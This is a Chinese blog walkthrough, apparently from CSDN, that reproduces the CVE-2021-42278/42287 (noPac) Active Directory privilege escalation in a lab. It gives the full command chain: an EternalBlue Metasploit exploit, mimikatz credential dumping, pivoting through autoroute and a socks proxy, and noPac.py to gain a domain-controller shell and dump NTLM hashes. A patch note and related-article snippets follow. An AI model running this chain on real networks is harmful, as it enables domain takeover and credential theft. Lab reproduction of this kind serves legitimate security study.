域内提权之CVE-2021-42278漏洞复现

已于 2024-03-08 13:05:32 修改
阅读量1.2k 收藏 6
点赞数
分类专栏: 漏洞复现及修复建议 文章标签: 安全 网络 网络安全
于 2022-11-21 18:39:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/127970041
版权

关注WX:【小白SEC】查看更多内容……

本文仅为验证漏洞,在本地环境测试验证,无其它目的

前提说明

近期继续复现漏洞,本次复现域内提权漏洞,是一个老漏洞,需要一定的条件,写的不好,是自己学习的总结,大佬们看到了不要嘲笑略过就行,感谢。
此漏洞利用需要几个条件:

  1. 域控信息
  2. 已知的域内用户账号信息

CVE编号:

CVE-2021-42278

漏洞说明:

关于此域内提权漏洞的说明我就不啰嗦,我也可能说不明白,这里放上一个【Seebug Paper】发的文章,写的不错,有兴趣可以学习一下。https://paper.seebug.org/1904/

环境说明

在这里插入图片描述

本次模拟目标PC存在双网卡(外网+内网),外网网卡可直接通过kali攻击机进行访问,同时目标机在test.com域环境内,域内存在域控服务器。
攻击机:
● 系统:kali
● IP:192.168.100.6
目标PC:
● 系统:Windows7
● IP1:192.168.100.59
● IP2:10.0.10.6
域控服务器:
● IP:10.0.10.5

测试:

  1. 使用nmap扫描目标机网段是否存在漏洞,此处使用nmap进行漏洞探测,经过扫描发现192.168.100.59的主机存在【CVE-2017-0143】即【MS17010永恒之蓝】漏洞,开始准备下一步攻击:
nmap --script=vuln 192.168.100.0/24 -v

在这里插入图片描述

  1. 启用【Metasploit】工具,输入:search ms17-010查找ms17010漏洞利用模块:
    在这里插入图片描述

  2. 使用use exploit/windows/smb/ms17_010_eternalblue选择攻击模块,设置攻击目标为192.168.100.59:set RHOSTS 192.168.100.59
    在这里插入图片描述

  3. 输入命令:run进行攻击,成功获得【Meterpreter】:
    在这里插入图片描述

  4. 查看当前权限:getuid,此处直接是system权限,如果权限不够的话可以尝试getsystem进行提权,如下方第二张图:
    在这里插入图片描述
    在这里插入图片描述

  5. 调用msf的kiwi模块:load kiwi
    在这里插入图片描述

  6. 使用命令获取主机账号密码等:

kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords

在这里插入图片描述

  1. 此刻已获取到本次需要的部分信息,还需要获取域控IP:
域主机:WIN-1TE9A61NRLD
域名:test.com
域内用户:ceshi	密码:test!@#123

  1. 在【Meterpreter】中输入shell,然后查询ip信息,但是此时返回的是乱码:
    在这里插入图片描述

  2. 可以输入:chcp 65001,再次查看IP:
    在这里插入图片描述

  3. 此时已获得我们提权所需要的所有信息,因为域控服务器还在内网,所以需要添加路由再使用代理进行攻击:

  4. 在【Meterpreter】窗口依次输入以下命令:

run get_local_subnets //查看网段
run autoroute -s 10.0.10.0/24
run autoroute -p //查看已添加的路由

在这里插入图片描述

  1. 输入【background】将【Meterpreter】后台运行:
    在这里插入图片描述

  2. 使用:use auxiliary/server/socks_proxy,调用socks代理模块,如果不需要专门设置什么密码等,就直接执行run即可:
    在这里插入图片描述

  3. 代理开启成功后,需要配置代理工具【proxychains4】,没有的话需要进行下载,kali中应该是自带了【proxychains4】工具,所以直接:echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf,在文末添加:socks5 127.0.0.1 1080
    在这里插入图片描述

  4. 开始进行CVE-2021-42278漏洞攻击,需要下载一个工具,工具下载地址:https://github.com/cube0x0/noPac:

  5. 下载到kali后,进入目录

  6. 输入:proxychains python3 noPac.py -use-ldap test.com/ceshi:'test!@#123' -dc-ip 10.0.10.5 -shell可以进入域控主机执行命令:
    在这里插入图片描述

  7. 或者输入:proxychains python3 noPac.py -use-ldap test.com/ceshi:'test!@#123' -dc-ip 10.0.10.5 -dump -just-dc-ntlm获取hash:
    在这里插入图片描述

漏洞修复

可以参考Microsoft安全修复建议打上对应补丁即可:CVE-2021-42278、CVE-2021-42287

Acczdy
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞-CVE-2021-42287&42278复现
君行路的博客
12-16 1万+
文章目录环境介绍sam-the-admin python利用脚本noPac利用脚本利用流程1. 查询MAQ值2. 普通用户创建机器账户并清除SPN3. 重设机器名称4. 为机器账户请求TGT5. 再次更改机器账户的sAMAccountName6. 通过S4U2self协议向DC请求TGS票据参考链接 微信公众号:信安文摘 环境介绍 :god.org windows 7 192.168.52.143 机器名称:stu1 内普通用户:liukaifeng01:hongrisec@2021@ wind
CVE-2021-42278内权限提升
include_voidmain的博客
03-16 4946
0x01 漏洞背景 前些日子的靶场中涉及到了提权,当时刚好爆出CVE-2022-42278这个提权漏洞,正好下载下来了POC试了试,确实不错,于是打算看看这个只需一个用户,就能获取控权限的漏洞怎么回事,便有了这篇文章。 0x02 环境搭建 在这里搭建了一个简单的内网环境,主机AD_USER将445端口暴露在外,并且存在ms17_010,hacker通过AD_USER的445端口进入内,随后通过CVE-2021-42287拿下AD。 环境详情: 主机IP Hacker192.168.80.12
CVE-2021-42287/CVE-2021-42278 Windows提权漏洞分析】
mingyqf的博客
04-14 3227
转发至:安全客 https://www.anquanke.com/post/id/263910 CVE-2021-42287/CVE-2021-42278 Windows提权漏洞分析 ​ 阅读量 76400 ​ 分享到:
简单的内的提权
最新发布
m0_74326506的博客
07-11 1035
42287:微软规定一台机器的机器账号名以$结尾,但又没有做验证,所以一台机器叫dc的话,可以创建有着机器账户属性的dc账户44278:用dc账户向AS申请TGT票据后,然后去向TGS申请ST,在申请ST的时候删除dc这个账户,那么KDC在验证时就查不到dc这个账户,进而查到dc$这个账户,于是就将ST颁给dc¥这个账户。
CVE-2021-42287/CVE-2021-42278利用
weixin_45945976的博客
12-20 701
CVE-2021-42287/CVE-2021-42278利用 地址:https://github.com/cube0x0/noPac
CVE-2021-42278 & CVE-2021-42287提权漏洞
good good study
02-17 2818
2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVECVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致内普通用户权限提升至管权限。是一个安全绕过漏洞,允许通过修改机器账户的sAMAccountName属性来冒充控制器。与标准用户相比,机器账户的名字以$结尾,但AD并没有验证内机器账户中是否有$,导致机器账户可以被假冒。是影响Kerberos特权属性证书(PAC)的安全绕过漏洞,允许通过假冒控制器,使密钥分发中心KDC创建高权限票据。
提权 (CVE-2021-42278 & CVE-2021-42287) 漏洞利用
Captain_RB的博客
07-03 2980
2021年11月,Microsoft 曝出了两个关于 Windows AD 提权漏洞CVE-2021-42278 & CVE-2021-42287,CVSS V3.1评分均为8.8,两个漏洞组合可导致内普通用户提升至管权限,文章主要对漏洞利用使用的两种自动化脚本进行介绍。...............
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-26855
03-12
CVE-2021-26855-PoC CVE-2021-26855的PoC漏洞利用代码。 原始代码由开发。 添加其他功能(用户枚举等)后不久,原始存储库被删除。 如果您有最新版本,请发布拉取请求。 CVE-2021-26855 SSRF轻松使用Golang练习 受影响的版本: Exchange Server 2013小于CU23 Exchange Server 2016小于CU18 Exchange Server 2019小于CU7 使用条件: 此漏洞与以前的交换漏洞不同。 此漏洞不需要可以登录的用户身份。它可以在未经授权的情况下获取内部用户资源。 它可以与CVE-2021-27065一起使用以实现远程命令执行。 漏洞触发要求: Vulnerability in the target server The target exchange server must be a
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令标记该映像并将其推送到Dockerhub。 docker login docker build -t validationwebhook:1.0 . docker tag validationwebhook:1.0 darryk/dev:1.0 docker push darryk/dev:1.0 现在,您可以将使用Node.js应用程序创建的映像部署到您的K8s集群中。 webhook-deploy.yaml将在群集中部署所有必需的组件。 kubectl apply -f webhook-d
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2022-22965漏洞复现
Foreverlove112的博客
10-01 449
CVE-2022-22965漏洞复现
网络攻防|CVE-2021-42287、CVE-2021-42278提权
weixin_42282189的博客
12-20 2471
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 漏洞原理 Microsoft Windows Active Directory 服务权限提升漏洞CVE-2021-42278CVE-2021-42287)攻击者可利用该漏洞内的普通用户权限提升到管理员权限,造成风险和危害极大。 漏洞情报来源: 1、影响版本 CVE-2021-42278 ○ Windows Server 2012 R2 ○ Windows Server 2012 (S.
[内网渗透]—NetLogon 提权漏洞(CVE-2020-1472)
Sentiment的博客
12-16 621
CVE-2020-1472 是⼀个 windows 控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与控间易受攻击的安全通道时,可利⽤此漏洞获取管访问权限(将控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。获取了一个加入了的计算机权限,在普通账号的情况下,将管密码置空,导出管hash,然后进行连接。
Windows服务权限提升漏洞CVE-2021-42287, CVE-2021-42278
热门推荐
chaojixiaojingang
12-22 1万+
1.漏洞描述 Windows服务权限提升漏洞CVE-2021-42287, CVE-2021-42278)是由于Active Directory 服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将内的普通用户权限提升到管理员权限等危害。 2.影响版本 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Serve
CVE-2022-26923提权漏洞
m0_46377671的博客
05-24 3144
CVE-2022-26923提权漏洞 参考链接: http://www.ctfiot.com/40081.html https://tryhackme.com/room/cve202226923 https://www.bilibili.com/video/BV1hL4y1F79y?spm_id_from=333.337.search-card.all.click 1.漏洞背景 Windows Active Directory (AD) 不仅用于身份和访问管理,还提供大量服务来帮助您运行和管理您的组织,其
RXDNFuse复现
05-01
RXDNFuse是一种用于绕过Windows用户账户控制(UAC)的技术,它可以使得普通用户获得管理员权限。这个技术是通过DLL注入来实现的。具体地说,它通过将恶意DLL注入到Windows系统进程中,并利用进程完整性级别低于管理员权限的漏洞,从而绕过UAC限制,获取系统管理员权限。 复现RXDNFuse技术需要具备一定的技术知识和实践经验。简单来说,复现RXDNFuse的过程包括以下几个步骤: 1. 寻找可注入的Windows系统进程; 2. 制作恶意DLL文件; 3. 利用工具或手动将恶意DLL注入到系统进程中; 4. 触发漏洞,使得恶意DLL被执行; 5. 获得管理员权限。 需要注意的是,复现RXDNFuse技术属于安全研究领,只能在合法授权和安全测试环境下进行。在未经授权的情况下使用该技术可能会触犯法律法规,造成不必要的后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值